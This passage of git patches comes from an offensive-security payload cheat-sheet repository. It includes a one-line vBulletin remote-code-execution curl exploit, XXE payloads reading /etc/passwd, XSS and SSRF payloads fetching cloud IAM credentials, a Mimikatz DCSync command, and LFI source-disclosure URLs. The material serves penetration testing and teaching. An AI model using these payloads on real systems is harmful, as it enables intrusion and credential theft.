'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN +``` + +### Twitter API Secret + +```powershell +curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token' +``` + +### Twitter Bearer Token + +```powershell +curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN' +``` + +### Gitlab Personal Access Token + +```powershell +curl "https://gitlab.example.com/api/v4/projects?private_token=" +``` + + +## References + +* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d) +* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060) \ No newline at end of file From 3221197b1ef9328ece13fc1d5e4369e04faa5f83 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 26 Sep 2019 20:41:01 +0200 Subject: [PATCH 057/222] RCE vBulletin + findomain --- CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh | 1 + Insecure Deserialization/README.md | 3 ++- Methodology and Resources/Subdomains Enumeration.md | 12 ++++++++++++ XSS Injection/README.md | 2 ++ 4 files changed, 17 insertions(+), 1 deletion(-) create mode 100644 CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh diff --git a/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh new file mode 100644 index 00000000..3ebf64a2 --- /dev/null +++ b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh @@ -0,0 +1 @@ +curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;" \ No newline at end of file diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index 4a0ed0fb..aa058259 100644 --- a/Insecure Deserialization/README.md +++ b/Insecure Deserialization/README.md @@ -24,4 +24,5 @@ Check the following sub-sections, located in other files : * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg * [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) -* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals \ No newline at end of file +* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals +* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) \ No newline at end of file diff --git a/Methodology and Resources/Subdomains Enumeration.md b/Methodology and Resources/Subdomains Enumeration.md index 0806a99a..88ee0e20 100644 --- a/Methodology and Resources/Subdomains Enumeration.md +++ b/Methodology and Resources/Subdomains Enumeration.md @@ -9,6 +9,7 @@ * EyeWitness * Sublist3r * Subfinder + * Findomain * Aquatone (Ruby and Go versions) * AltDNS * MassDNS @@ -86,6 +87,17 @@ go get github.com/subfinder/subfinder ./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt ``` +### Using Findomain + +```powershell +$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux +$ chmod +x findomain-linux +$ findomain_spyse_token="YourAccessToken" +$ findomain_virustotal_token="YourAccessToken" +$ findomain_fb_token="YourAccessToken" +$ ./findomain-linux -t example.com -o +``` + ### Using Aquatone - old version (Ruby) ```powershell diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 6bd8aa15..a0ccd8af 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -751,6 +751,8 @@ You don't need to close your tags. ```javascript %26%2397;lert(1) +alert +> ``` ### Bypass using Katana From 3fb2a9006ff4ee3cb0f294f6bbe179819d5cc92f Mon Sep 17 00:00:00 2001 From: Mark <55981308+Luci-d@users.noreply.github.com> Date: Mon, 30 Sep 2019 15:26:26 +0400 Subject: [PATCH 058/222] Add Spyse to network discovery 1. spyse itself 2. python wrapper - using only a part of the available functionality of spyse, but will be updated very soon. --- .../Network Discovery.md | 30 ++++++++++++++++++- 1 file changed, 29 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md index 10a6b63e..bf050ed0 100644 --- a/Methodology and Resources/Network Discovery.md +++ b/Methodology and Resources/Network Discovery.md @@ -3,6 +3,7 @@ ## Summary - [Nmap](#nmap) +- [Spyse](#spyse) - [Masscan](#masscan) - [Netdiscover](#netdiscover) - [Responder](#responder) @@ -97,6 +98,33 @@ Host script results: List Nmap scripts : ls /usr/share/nmap/scripts/ ``` +## Spyse +* Spyse API - for detailed info is better to check [Spyse](https://spyse.com/) + +* [Spyse Wrapper](https://github.com/zeropwn/spyse.py) + +#### Searching for subdomains +```bash +spyse -target xbox.com --subdomains +``` + +#### Reverse IP Lookup +```bash +spyse -target 52.14.144.171 --domains-on-ip +``` + +#### Searching for SSL certificates +```bash +spyse -target hotmail.com --ssl-certificates +``` +```bash +spyse -target "org: Microsoft" --ssl-certificates +``` +#### Getting all DNS records +```bash +spyse -target xbox.com --dns-all +``` + ## Masscan ```powershell @@ -170,4 +198,4 @@ bettercap -X --proxy --proxy-https -T ## References -* [TODO](TODO) \ No newline at end of file +* [TODO](TODO) From f2beb0dbbc998fe4d9f31a62aa7412564dbd728b Mon Sep 17 00:00:00 2001 From: Philippe Arteau Date: Tue, 1 Oct 2019 18:22:42 -0400 Subject: [PATCH 059/222] Add local DTD section to the XXE Injection page --- XXE Injection/README.md | 43 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 378c8c29..58017175 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -288,6 +288,47 @@ Send the XML file to the `deploy` folder. Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) + +## XXE with local DTD + +In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this: +```xml +]> +&test; +``` + +If error based exfiltration is possible, you can still rely on a local DTD to do concatenation tricks. Payload to confirm that error message include filename. + +```xml + + + %local_dtd; +]> + +``` + +Assuming payloads such as the previous return a verbose error. You can start pointing to local DTD. With an found DTD, you can submit payload such as the following payload. The content of the file will be place in the error message. + +```xml + + + + "> + %eval; + %error; + '> + + %local_dtd; +]> + +``` + +[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) + + ## XXE in exotic files ### XXE inside SVG @@ -341,6 +382,7 @@ JPG (experimental) GIF (experimental) ``` + ## References * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) @@ -360,3 +402,4 @@ GIF (experimental) * [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) +- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) From e180d1f7e62bc17e7361faa7fdb693070b174c00 Mon Sep 17 00:00:00 2001 From: marcan2020 Date: Wed, 2 Oct 2019 20:09:41 -0400 Subject: [PATCH 060/222] Fix dead youtube link --- Web Cache Deception/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Web Cache Deception/README.md b/Web Cache Deception/README.md index c45fdfca..097c86aa 100644 --- a/Web Cache Deception/README.md +++ b/Web Cache Deception/README.md @@ -22,7 +22,7 @@ 5. The content of the cache is displayed Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page -[![YOUTUBE DEMO](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8) +[![DEMO](https://i.vimeocdn.com/video/674856618.jpg)](https://vimeo.com/249130093) ## Methodology 2 @@ -55,4 +55,4 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html) * [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning) * [Web Caching - SI9INT](https://si9int.sh/article/6) -* [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29) \ No newline at end of file +* [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29) From 4f38666c354e8f641e9cf76b70d56dae0720d4d7 Mon Sep 17 00:00:00 2001 From: marcan2020 Date: Wed, 2 Oct 2019 20:23:37 -0400 Subject: [PATCH 061/222] Add .NET references --- Insecure Deserialization/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index aa058259..514fd13e 100644 --- a/Insecure Deserialization/README.md +++ b/Insecure Deserialization/README.md @@ -12,6 +12,7 @@ Check the following sub-sections, located in other files : ## References * [Github - ysoserial](https://github.com/frohoff/ysoserial) +* [Github - ysoserial.net](https://github.com/pwntester/ysoserial.net) * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) * [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) @@ -25,4 +26,5 @@ Check the following sub-sections, located in other files : * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg * [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) * [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals -* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) \ No newline at end of file +* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) +* [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh From 920da73bd7714fd8bbc712d480f59bc07fb83f21 Mon Sep 17 00:00:00 2001 From: marcan2020 Date: Wed, 2 Oct 2019 21:24:53 -0400 Subject: [PATCH 062/222] Add Angular automatic sanitization --- XSS Injection/XSS in Angular.md | 46 +++++++++++++++++++++++++++++++-- 1 file changed, 44 insertions(+), 2 deletions(-) diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/XSS in Angular.md index 61b3af58..21302e88 100644 --- a/XSS Injection/XSS in Angular.md +++ b/XSS Injection/XSS in Angular.md @@ -1,8 +1,10 @@ # XSS in Angular +## Client Side Template Injection + The following payloads are based on Client Side Template Injection. -## Stored/Reflected XSS - Simple alert +### Stored/Reflected XSS - Simple alert > Angular as of version 1.6 have removed the sandbox altogether @@ -148,7 +150,7 @@ Angular 1.0.1 - 1.1.5 and Vue JS ``` -## Blind XSS +### Blind XSS 1.0.1 - 1.1.5 && > 1.6.0 by Mario Heiderich (Cure53) @@ -253,7 +255,47 @@ Shorter 1.0.1 - 1.1.5 && > 1.6.0 by Lewis Ardern (Synopsys) and Gareth Heyes (Po }} ``` +## Automatic Sanitization + +> To systematically block XSS bugs, Angular treats all values as untrusted by default. When a value is inserted into the DOM from a template, via property, attribute, style, class binding, or interpolation, Angular sanitizes and escapes untrusted values. + +However, it is possible to mark a value as trusted and prevent the automatic sanitization with these methods: + +- bypassSecurityTrustHtml +- bypassSecurityTrustScript +- bypassSecurityTrustStyle +- bypassSecurityTrustUrl +- bypassSecurityTrustResourceUrl + +Example of a component using the unsecure method `bypassSecurityTrustUrl`: + +``` +import { Component, OnInit } from '@angular/core'; + +@Component({ + selector: 'my-app', + template: ` +

An untrusted URL:

+

Click me

+

A trusted URL:

+

Click me

+ `, +}) +export class App { + constructor(private sanitizer: DomSanitizer) { + this.dangerousUrl = 'javascript:alert("Hi there")'; + this.trustedUrl = sanitizer.bypassSecurityTrustUrl(this.dangerousUrl); + } +} +``` + +![XSS](https://angular.io/generated/images/guide/security/bypass-security-component.png) + +When doing a code review, you want to make sure that no user input is being trusted since it will introduce a security vulnerability in the application. + ## References - [XSS without HTML - CSTI with Angular JS - Portswigger](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs) - [Blind XSS AngularJS Payloads](https://ardern.io/2018/12/07/angularjs-bxss) +- [Angular Security](https://angular.io/guide/security) +- [Bypass DomSanitizer](https://medium.com/@swarnakishore/angular-safe-pipe-implementation-to-bypass-domsanitizer-stripping-out-content-c1bf0f1cc36b) From 357658371f718329daa24a9d344264bf8fe93145 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 6 Oct 2019 20:59:58 +0200 Subject: [PATCH 063/222] SSRF URL for Google Cloud --- Methodology and Resources/Windows - Privilege Escalation.md | 5 ++++- Server Side Request Forgery/README.md | 2 ++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 8205602a..bf2b67cf 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -543,6 +543,8 @@ The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windo ```powershell wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ +wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """ + gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name ``` @@ -869,4 +871,5 @@ python2 send_and_execute.py 10.0.0.1 revshell.exe * [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/) * [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/) * [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/) -* [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS) \ No newline at end of file +* [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS) +* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html) \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 03183561..20a8878b 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -455,6 +455,8 @@ Docs: https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-ap ### SSRF URL for Google Cloud +:warning: Google is shutting down support for usage of the **v1 metadata service** on January 15. + Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" ```powershell From 9f463d156b96de4fa5049964c579c02dae33f09f Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Wed, 9 Oct 2019 16:53:34 +0200 Subject: [PATCH 064/222] little changes - fix exploits ToC anchor - add nosqlilab --- NoSQL Injection/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index 3714a3f2..b52f6bfa 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md @@ -5,7 +5,7 @@ ## Summary * [Tools](#tools) -* [Exploit](exploits) +* [Exploit](#exploits) * [Authentication Bypass](#authentication-bypass) * [Extract length information](#extract-length-information) * [Extract data information](#extract-data-information) @@ -18,6 +18,7 @@ ## Tools * [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap) +* [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab) ## Exploit From 03d02ccdd62241c5e3f5e842d9ef05180ee50d7a Mon Sep 17 00:00:00 2001 From: Ali Yazdani Date: Fri, 11 Oct 2019 12:56:22 +0200 Subject: [PATCH 065/222] Create readme.md Adding Kubernetes file --- Kubernetes/readme.md | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 Kubernetes/readme.md diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md new file mode 100644 index 00000000..8ab713bb --- /dev/null +++ b/Kubernetes/readme.md @@ -0,0 +1,33 @@ +Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation. + +### API addresses that you should know *(External network visibility)* +--- +#### - cAdvisor +``` +curl -k https://:4194 +``` +#### - Insecure API server +``` +curl -k https://:8080 +``` +#### - Secure API Server +``` +curl -k https://:(8|6)443/swaggerapi +curl -k https://:(8|6)443/healthz +curl -k https://:(8|6)443/api/v1 +``` +#### - etcd API +``` +curl -k https://:2379 +curl -k https://:2379/version +``` +#### - Kubelet API +``` +curl -k https://:10250 +curl -k https://:10250/metrics +curl -k https://:10250/pods +``` +#### - kubelet (Read only) +``` +curl -k https://:10255 +``` From 05b3e13098ce05f21116d9127175e64204a22bb9 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 12 Oct 2019 13:30:52 +0200 Subject: [PATCH 066/222] SSRF for ECS --- Server Side Request Forgery/README.md | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 20a8878b..0c615323 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -31,6 +31,7 @@ * [SSRF to XSS](#ssrf-to-xss) * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) + * [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs) * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk) * [SSRF URL for AWS Lambda](#ssrf-url-for-aws-lambda) * [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud) @@ -421,6 +422,15 @@ E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugi E.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/` +### SSRF URL for AWS ECS + +If you have an SSRF with file system access on an ECS instance, try extracting `/proc/self/environ` to get UUID. + +```powershell +curl http://169.254.170.2/v2/credentials/ +``` + +This way you'll extract IAM keys of the attached role ### SSRF URL for AWS Elastic Beanstalk From f0af3b4f4dc1c533ca81b5acc8188305e43ea59c Mon Sep 17 00:00:00 2001 From: OOP Date: Tue, 15 Oct 2019 23:18:07 +0700 Subject: [PATCH 067/222] Update Active Directory Attack.md --- Methodology and Resources/Active Directory Attack.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index f48597e4..3b790122 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -458,7 +458,7 @@ Converting kirbi => ccache ### Pass-the-Ticket Silver Tickets -Forging a TGS require machine accound password (key) from the KDC +Forging a TGS require machine accound password (key) or NTLM hash from the KDC ```powershell # Create a ticket for the service @@ -988,4 +988,4 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) * [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) -* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) \ No newline at end of file +* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) From 52d02cea63133e15a2679389681560c465128fe2 Mon Sep 17 00:00:00 2001 From: Ali Yazdani Date: Wed, 16 Oct 2019 14:45:42 +0200 Subject: [PATCH 068/222] Update readme.md Add some related security tools. --- Kubernetes/readme.md | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md index 8ab713bb..7971af27 100644 --- a/Kubernetes/readme.md +++ b/Kubernetes/readme.md @@ -1,4 +1,4 @@ -Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation. +> Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation. ### API addresses that you should know *(External network visibility)* --- @@ -31,3 +31,12 @@ curl -k https://:10250/pods ``` curl -k https://:10255 ``` +---- +### Tools for detecting misconfigurations in Kubernetes: +--- + +* [kubeaudit](https://github.com/Shopify/kubeaudit). kubeaudit is a command line tool to audit Kubernetes clusters for various different security concerns: run the container as a non-root user, use a read only root filesystem, drop scary capabilities, don't add new ones, don't run privileged, ... +* [kubesec.io](https://kubesec.io/). Security risk analysis for Kubernetes resources. +* [kube-bench](https://github.com/aquasecurity/kube-bench). kube-bench is a Go application that checks whether Kubernetes is deployed securely by running the checks documented in the [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/). + +* [katacoda](https://katacoda.com/courses/kubernetes). Learn Kubernetes using interactive broser-based scenarios. From 83caef8ee12dadbe71b2243c8f7000681aa148a8 Mon Sep 17 00:00:00 2001 From: Alex Zeecka Date: Thu, 17 Oct 2019 17:40:59 +0200 Subject: [PATCH 069/222] Add filter iconv utf16 LFI bypass tricks --- File Inclusion/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 29fbf59d..cfa22c28 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -122,6 +122,7 @@ The part "php://filter" is case insensitive ```powershell http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php +http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php ``` @@ -403,4 +404,4 @@ Then crack the hashes inside in order to login via SSH on the machine. * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/) * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) -* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1) \ No newline at end of file +* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1) From 8eae039a28a14e867920b8317f4c4801af703860 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 17 Oct 2019 21:13:04 +0200 Subject: [PATCH 070/222] netdoc:// wrapper for Java SSRF --- Server Side Request Forgery/README.md | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 0c615323..6293ec84 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -28,6 +28,7 @@ * [tftp://](#tftp) * [ldap://](#ldap) * [gopher://](#gopher) + * [netdoc://](#netdoc) * [SSRF to XSS](#ssrf-to-xss) * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) @@ -345,6 +346,14 @@ Content of evil.com/redirect.php: ?> ``` +### Netdoc + +Wrapper for Java when your payloads struggle with "\n" and "\r" characters. + +```powershell +ssrf.php?url=gopher://127.0.0.1:4242/DATA +``` + ## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) @@ -657,4 +666,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/) - [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) - [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) -- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) \ No newline at end of file +- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) +- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) \ No newline at end of file From 7159a3ded38448d9b32e75ea55d2a4bff57b34a2 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 18 Oct 2019 00:07:09 +0200 Subject: [PATCH 071/222] RODC dcsync note + Dumping AD Domain summary --- .../Active Directory Attack.md | 17 +++++++++++++++++ Server Side Request Forgery/README.md | 1 + 2 files changed, 18 insertions(+) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 3b790122..af91b3fa 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -8,6 +8,11 @@ * [Open Shares](#open-shares) * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol) * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit) + * Using ndtsutil + * Using Vshadow + * Using vssadmin + * Using DiskShadow + * Using Mimikatz DCSync * [Password in AD User comment](#password-in-ad-user-comment) * [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) * [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) @@ -378,6 +383,17 @@ cme smb 10.10.0.202 -u username -p password --ntds vss cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default ``` +#### Using Mimikatz DCSync + +Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. + +```powershell +mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt +``` + +:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default. + + ### Password in AD User comment ```powershell @@ -989,3 +1005,4 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) * [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) * [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) +* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 6293ec84..46070c93 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -52,6 +52,7 @@ - [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap) - [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus) - [See-SURF - https://github.com/In3tinct/See-SURF](https://github.com/In3tinct/See-SURF) +- [SSRF 